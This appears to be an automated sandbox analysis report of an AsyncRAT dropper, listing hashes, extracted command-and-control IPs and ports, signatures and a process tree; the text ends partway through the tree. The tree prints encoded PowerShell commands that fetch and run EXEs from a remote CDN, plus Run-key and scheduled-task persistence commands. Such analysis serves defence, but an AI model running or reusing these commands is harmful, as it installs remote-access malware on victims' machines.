Analysis
-
max time kernel
151s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
05-12-2022 06:23
Behavioral task
behavioral1
Sample
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe
Resource
win10v2004-20220812-en
General
-
Target
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe
-
Size
532KB
-
MD5
84e6aa267c6970d2d777d60840390102
-
SHA1
c97e555e98c5bec69bcad9607cf0153ff827a141
-
SHA256
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c
-
SHA512
47184ca58f7358bad24acbcfc2038a510a1ae55b90b927d79a98df13c0e911daeaadb1100f0dc112370fe61bf6264fb9ff214d143d17af659e0bd1ba16f0cecc
-
SSDEEP
12288:Lflmc/U97143ei/xLxS0VMmX+gJmdqKkSl2N3m:LNtsCF/x9S0KaJuqnSl2N3
Malware Config
Extracted
asyncrat
0.5.7B
System Guard Runtime
85.105.88.221:2531
System Guard Runtime
-
delay
3
-
install
false
-
install_file
System Guard Runtime
-
install_folder
%AppData%
Extracted
asyncrat
0.5.7B
DefenderSmartScren
217.64.31.3:8437
DefenderSmartScren
-
delay
3
-
install
false
-
install_file
SecurityHealtheurvice.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4560-251-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat behavioral2/memory/4504-289-0x0000000000400000-0x0000000000412000-memory.dmp asyncrat -
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeflow pid process 18 2236 powershell.exe 44 4996 powershell.exe 50 4900 powershell.exe 57 4572 powershell.exe 60 3104 powershell.exe 63 1120 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 18 IoCs
Processes:
0.exeATh6gvXFsr.exeJkGYpyAJ0I.exebaXLOuLByK.execbo4yLG34o.exe2sWNpbbWsk.exetHdB1QSPrG.exeOGd2tdo93o.exeDyfpo1N6ED.exeBVIpn2dy5y.exeyW1Buu2Hbr.exedsffe4vb5.exeqweqweqweqw.exeasdsadsadsa.exetryrtytryrty.exeqweqwewqe.exedsffe4vb5.exeretertee.exepid process 4940 0.exe 4276 ATh6gvXFsr.exe 1300 JkGYpyAJ0I.exe 4052 baXLOuLByK.exe 1904 cbo4yLG34o.exe 952 2sWNpbbWsk.exe 3616 tHdB1QSPrG.exe 3052 OGd2tdo93o.exe 4760 Dyfpo1N6ED.exe 2416 BVIpn2dy5y.exe 1616 yW1Buu2Hbr.exe 1540 dsffe4vb5.exe 2724 qweqweqweqw.exe 3160 asdsadsadsa.exe 2092 tryrtytryrty.exe 3992 qweqwewqe.exe 624 dsffe4vb5.exe 4044 retertee.exe -
Processes:
resource yara_rule behavioral2/memory/868-132-0x00007FF704F40000-0x00007FF70509F000-memory.dmp upx behavioral2/memory/868-134-0x00007FF704F40000-0x00007FF70509F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\0.exe upx C:\Users\Admin\AppData\Local\Temp\0.exe upx behavioral2/memory/4940-138-0x00007FF7B4340000-0x00007FF7B44A3000-memory.dmp upx behavioral2/memory/4940-193-0x00007FF7B4340000-0x00007FF7B44A3000-memory.dmp upx -
Checks computer location settings 2 TTPs 10 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
JkGYpyAJ0I.exetHdB1QSPrG.exe2sWNpbbWsk.exeDyfpo1N6ED.exeATh6gvXFsr.execbo4yLG34o.exeOGd2tdo93o.exeBVIpn2dy5y.exeyW1Buu2Hbr.exebaXLOuLByK.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation JkGYpyAJ0I.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation tHdB1QSPrG.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation 2sWNpbbWsk.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation Dyfpo1N6ED.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation ATh6gvXFsr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation cbo4yLG34o.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation OGd2tdo93o.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation BVIpn2dy5y.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation yW1Buu2Hbr.exe Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation baXLOuLByK.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
powershell.exepowershell.exeretertee.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SystemGuardRuntime = "C:\\Users\\Admin\\AppData\\Roaming\\SystemGuardRuntime\\SystemGuardRuntime.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SecurityHealthService = "C:\\Users\\Admin\\AppData\\Roaming\\SecurityHealthService\\SecurityHealthService.exe" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\OperaSetups = "C:\\Users\\Admin\\AppData\\Roaming\\RuntimeBroker\\RuntimeBroker.exe" retertee.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
qweqweqweqw.exedsffe4vb5.exetryrtytryrty.exeasdsadsadsa.exedsffe4vb5.exedescription pid process target process PID 2724 set thread context of 4560 2724 qweqweqweqw.exe RegAsm.exe PID 1540 set thread context of 952 1540 dsffe4vb5.exe RegAsm.exe PID 2092 set thread context of 4504 2092 tryrtytryrty.exe RegAsm.exe PID 3160 set thread context of 2596 3160 asdsadsadsa.exe RegAsm.exe PID 624 set thread context of 1008 624 dsffe4vb5.exe RegAsm.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 3816 3992 WerFault.exe qweqwewqe.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 3668 schtasks.exe 4532 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeqweqweqweqw.exepowershell.exepowershell.exepid process 4900 powershell.exe 4996 powershell.exe 4996 powershell.exe 2236 powershell.exe 2236 powershell.exe 1120 powershell.exe 1120 powershell.exe 3104 powershell.exe 3104 powershell.exe 4572 powershell.exe 4572 powershell.exe 2236 powershell.exe 1120 powershell.exe 1324 powershell.exe 1324 powershell.exe 4900 powershell.exe 4900 powershell.exe 4676 powershell.exe 4676 powershell.exe 4996 powershell.exe 3104 powershell.exe 4948 powershell.exe 4948 powershell.exe 3484 powershell.exe 3484 powershell.exe 4572 powershell.exe 4676 powershell.exe 1324 powershell.exe 4948 powershell.exe 3484 powershell.exe 2724 qweqweqweqw.exe 2724 qweqweqweqw.exe 2732 powershell.exe 2732 powershell.exe 2732 powershell.exe 740 powershell.exe 740 powershell.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeqweqweqweqw.exepowershell.exedsffe4vb5.exepowershell.exeasdsadsadsa.exedsffe4vb5.exedescription pid process Token: SeDebugPrivilege 4900 powershell.exe Token: SeDebugPrivilege 4996 powershell.exe Token: SeDebugPrivilege 2236 powershell.exe Token: SeDebugPrivilege 1120 powershell.exe Token: SeDebugPrivilege 3104 powershell.exe Token: SeDebugPrivilege 4572 powershell.exe Token: SeDebugPrivilege 1324 powershell.exe Token: SeDebugPrivilege 4676 powershell.exe Token: SeDebugPrivilege 4948 powershell.exe Token: SeDebugPrivilege 3484 powershell.exe Token: SeDebugPrivilege 2724 qweqweqweqw.exe Token: SeDebugPrivilege 2732 powershell.exe Token: SeDebugPrivilege 1540 dsffe4vb5.exe Token: SeDebugPrivilege 740 powershell.exe Token: SeDebugPrivilege 3160 asdsadsadsa.exe Token: SeDebugPrivilege 624 dsffe4vb5.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.execmd.exe0.execmd.execmd.execmd.exeATh6gvXFsr.exeJkGYpyAJ0I.exebaXLOuLByK.execmd.execmd.execmd.execmd.exetHdB1QSPrG.execbo4yLG34o.exe2sWNpbbWsk.execmd.exeOGd2tdo93o.execmd.exeDyfpo1N6ED.execmd.exeBVIpn2dy5y.exeyW1Buu2Hbr.exedescription pid process target process PID 868 wrote to memory of 4204 868 69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe cmd.exe PID 868 wrote to memory of 4204 868 69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe cmd.exe PID 4204 wrote to memory of 4940 4204 cmd.exe 0.exe PID 4204 wrote to memory of 4940 4204 cmd.exe 0.exe PID 4940 wrote to memory of 3232 4940 0.exe cmd.exe PID 4940 wrote to memory of 3232 4940 0.exe cmd.exe PID 4940 wrote to memory of 460 4940 0.exe cmd.exe PID 4940 wrote to memory of 460 4940 0.exe cmd.exe PID 3232 wrote to memory of 4276 3232 cmd.exe ATh6gvXFsr.exe PID 3232 wrote to memory of 4276 3232 cmd.exe ATh6gvXFsr.exe PID 4940 wrote to memory of 1076 4940 0.exe cmd.exe PID 4940 wrote to memory of 1076 4940 0.exe cmd.exe PID 460 wrote to memory of 1300 460 cmd.exe JkGYpyAJ0I.exe PID 460 wrote to memory of 1300 460 cmd.exe JkGYpyAJ0I.exe PID 4940 wrote to memory of 4468 4940 0.exe cmd.exe PID 4940 wrote to memory of 4468 4940 0.exe cmd.exe PID 1076 wrote to memory of 4052 1076 cmd.exe baXLOuLByK.exe PID 1076 wrote to memory of 4052 1076 cmd.exe baXLOuLByK.exe PID 4940 wrote to memory of 4784 4940 0.exe cmd.exe PID 4940 wrote to memory of 4784 4940 0.exe cmd.exe PID 4276 wrote to memory of 2236 4276 ATh6gvXFsr.exe powershell.exe PID 4276 wrote to memory of 2236 4276 ATh6gvXFsr.exe powershell.exe PID 4940 wrote to memory of 4984 4940 0.exe cmd.exe PID 4940 wrote to memory of 4984 4940 0.exe cmd.exe PID 1300 wrote to memory of 4996 1300 JkGYpyAJ0I.exe powershell.exe PID 1300 wrote to memory of 4996 1300 JkGYpyAJ0I.exe powershell.exe PID 4052 wrote to memory of 4900 4052 baXLOuLByK.exe powershell.exe PID 4052 wrote to memory of 4900 4052 baXLOuLByK.exe powershell.exe PID 4940 wrote to memory of 2052 4940 0.exe cmd.exe PID 4940 wrote to memory of 2052 4940 0.exe cmd.exe PID 4940 wrote to memory of 4848 4940 0.exe cmd.exe PID 4940 wrote to memory of 4848 4940 0.exe cmd.exe PID 4784 wrote to memory of 952 4784 cmd.exe 2sWNpbbWsk.exe PID 4784 wrote to memory of 952 4784 cmd.exe 2sWNpbbWsk.exe PID 4468 wrote to memory of 1904 4468 cmd.exe cbo4yLG34o.exe PID 4468 wrote to memory of 1904 4468 cmd.exe cbo4yLG34o.exe PID 4984 wrote to memory of 3616 4984 cmd.exe tHdB1QSPrG.exe PID 4984 wrote to memory of 3616 4984 cmd.exe tHdB1QSPrG.exe PID 2052 wrote to memory of 3052 2052 cmd.exe OGd2tdo93o.exe PID 2052 wrote to memory of 3052 2052 cmd.exe OGd2tdo93o.exe PID 4940 wrote to memory of 2128 4940 0.exe cmd.exe PID 4940 wrote to memory of 2128 4940 0.exe cmd.exe PID 3616 wrote to memory of 1120 3616 tHdB1QSPrG.exe powershell.exe PID 3616 wrote to memory of 1120 3616 tHdB1QSPrG.exe powershell.exe PID 1904 wrote to memory of 4572 1904 cbo4yLG34o.exe powershell.exe PID 1904 wrote to memory of 4572 1904 cbo4yLG34o.exe powershell.exe PID 952 wrote to memory of 3104 952 2sWNpbbWsk.exe powershell.exe PID 952 wrote to memory of 3104 952 2sWNpbbWsk.exe powershell.exe PID 4940 wrote to memory of 4520 4940 0.exe cmd.exe PID 4940 wrote to memory of 4520 4940 0.exe cmd.exe PID 4848 wrote to memory of 4760 4848 cmd.exe Dyfpo1N6ED.exe PID 4848 wrote to memory of 4760 4848 cmd.exe Dyfpo1N6ED.exe PID 3052 wrote to memory of 1324 3052 OGd2tdo93o.exe powershell.exe PID 3052 wrote to memory of 1324 3052 OGd2tdo93o.exe powershell.exe PID 2128 wrote to memory of 2416 2128 cmd.exe BVIpn2dy5y.exe PID 2128 wrote to memory of 2416 2128 cmd.exe BVIpn2dy5y.exe PID 4760 wrote to memory of 4676 4760 Dyfpo1N6ED.exe powershell.exe PID 4760 wrote to memory of 4676 4760 Dyfpo1N6ED.exe powershell.exe PID 4520 wrote to memory of 1616 4520 cmd.exe yW1Buu2Hbr.exe PID 4520 wrote to memory of 1616 4520 cmd.exe yW1Buu2Hbr.exe PID 2416 wrote to memory of 4948 2416 BVIpn2dy5y.exe powershell.exe PID 2416 wrote to memory of 4948 2416 BVIpn2dy5y.exe powershell.exe PID 1616 wrote to memory of 3484 1616 yW1Buu2Hbr.exe powershell.exe PID 1616 wrote to memory of 3484 1616 yW1Buu2Hbr.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe"C:\Users\Admin\AppData\Local\Temp\69f7c84e27083e5af30a91c797c6c1d5b694c2926ebb8a9edb7c6ed8e4c3cb3c.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\0.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\0.exeC:\Users\Admin\AppData\Local\Temp\0.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\ATh6gvXFsr.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ATh6gvXFsr.exeC:\Users\Admin\AppData\Local\Temp\ATh6gvXFsr.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAeQB1ACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAwADQAMgA0ADcANwA0ADEANwA2ADYAOAA4ADAAOAA3ADgANQAvADEAMAA0ADIANAA3ADcANQAwADYANAA4ADMAMQA5ADUAOQA2ADQALwBwAGwAbABtAG0AZABpAGkAcABtAC4AZQB4AGUAJwAsACAAPAAjAGwAdgBkACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdABqAHcAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAawBlAGEAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAZABzAGYAZgBlADQAdgBiADUALgBlAHgAZQAnACkAKQA8ACMAZQB6AHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAYgByAHEAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAcQB1ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGQAcwBmAGYAZQA0AHYAYgA1AC4AZQB4AGUAJwApADwAIwByAHMAawAjAD4A"6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe"C:\Users\Admin\AppData\Roaming\dsffe4vb5.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\JkGYpyAJ0I.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\JkGYpyAJ0I.exeC:\Users\Admin\AppData\Local\Temp\JkGYpyAJ0I.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAaQBoACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAzADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADEAOQA4ADgAOAAxADkAOQA3ADMAMAAvAEMAUgAuAGUAeABlACcALAAgADwAIwB1AGkAbgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHcAcwBkACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGIAagBiACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHEAdwBlAHEAdwBlAHEAdwBlAHEAdwAuAGUAeABlACcAKQApADwAIwB3AGkAYwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB3AHMAeAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAYwByAGkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAcQB3AGUAcQB3AGUAcQB3AGUAcQB3AC4AZQB4AGUAJwApADwAIwBnAHcAaQAjAD4A"6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\qweqweqweqw.exe"C:\Users\Admin\AppData\Roaming\qweqweqweqw.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SystemGuardRuntime' -Value '"C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe"' -PropertyType 'String'8⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SystemGuardRuntime /tr "C:\Users\Admin\AppData\Roaming\SystemGuardRuntime\SystemGuardRuntime.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f9⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd8⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd8⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\baXLOuLByK.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\baXLOuLByK.exeC:\Users\Admin\AppData\Local\Temp\baXLOuLByK.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAbgBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA1ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADQANAAwADgAOQAzADIANQA2ADUAOQAvAGwAYwBvAG0AcABsAGMAbQBwAG8ALgBlAHgAZQAnACwAIAA8ACMAZgBwAHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBiAGIAawAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBnAHoAYQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBhAHMAZABzAGEAZABzAGEAZABzAGEALgBlAHgAZQAnACkAKQA8ACMAZwBsAHgAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAHQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAGcAagBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAGEAcwBkAHMAYQBkAHMAYQBkAHMAYQAuAGUAeABlACcAKQA8ACMAcgBjAGsAIwA+AA=="6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe"C:\Users\Admin\AppData\Roaming\asdsadsadsa.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"8⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\cbo4yLG34o.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\cbo4yLG34o.exeC:\Users\Admin\AppData\Local\Temp\cbo4yLG34o.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAbgBiACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA4ADAAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANAAyADQANwA3ADQAMQA3ADYANgA4ADgAMAA4ADcAOAA1AC8AMQAwADQAMgA0ADcANwA1ADUANAA4ADQANwA3ADEAOQA0ADQANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAGoAcABmACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdgB0AHAAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdwBkAHUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdAByAHkAcgB0AHkAdAByAHkAcgB0AHkALgBlAHgAZQAnACkAKQA8ACMAZQBiAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAcwBmAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAG0AbQBtACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHQAcgB5AHIAdAB5AHQAcgB5AHIAdAB5AC4AZQB4AGUAJwApADwAIwBiAHcAdgAjAD4A"6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe"C:\Users\Admin\AppData\Roaming\tryrtytryrty.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'SecurityHealthService' -Value '"C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe"' -PropertyType 'String'8⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"cmd" /C schtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn \SecurityHealthService /tr "C:\Users\Admin\AppData\Roaming\SecurityHealthService\SecurityHealthService.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f9⤵
- Creates scheduled task(s)
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe#cmd8⤵
-
C:\Windows\system32\cmd.exe"cmd" /C C:\Users\Admin\AppData\Local\Temp\2sWNpbbWsk.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\2sWNpbbWsk.exeC:\Users\Admin\AppData\Local\Temp\2sWNpbbWsk.exe5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
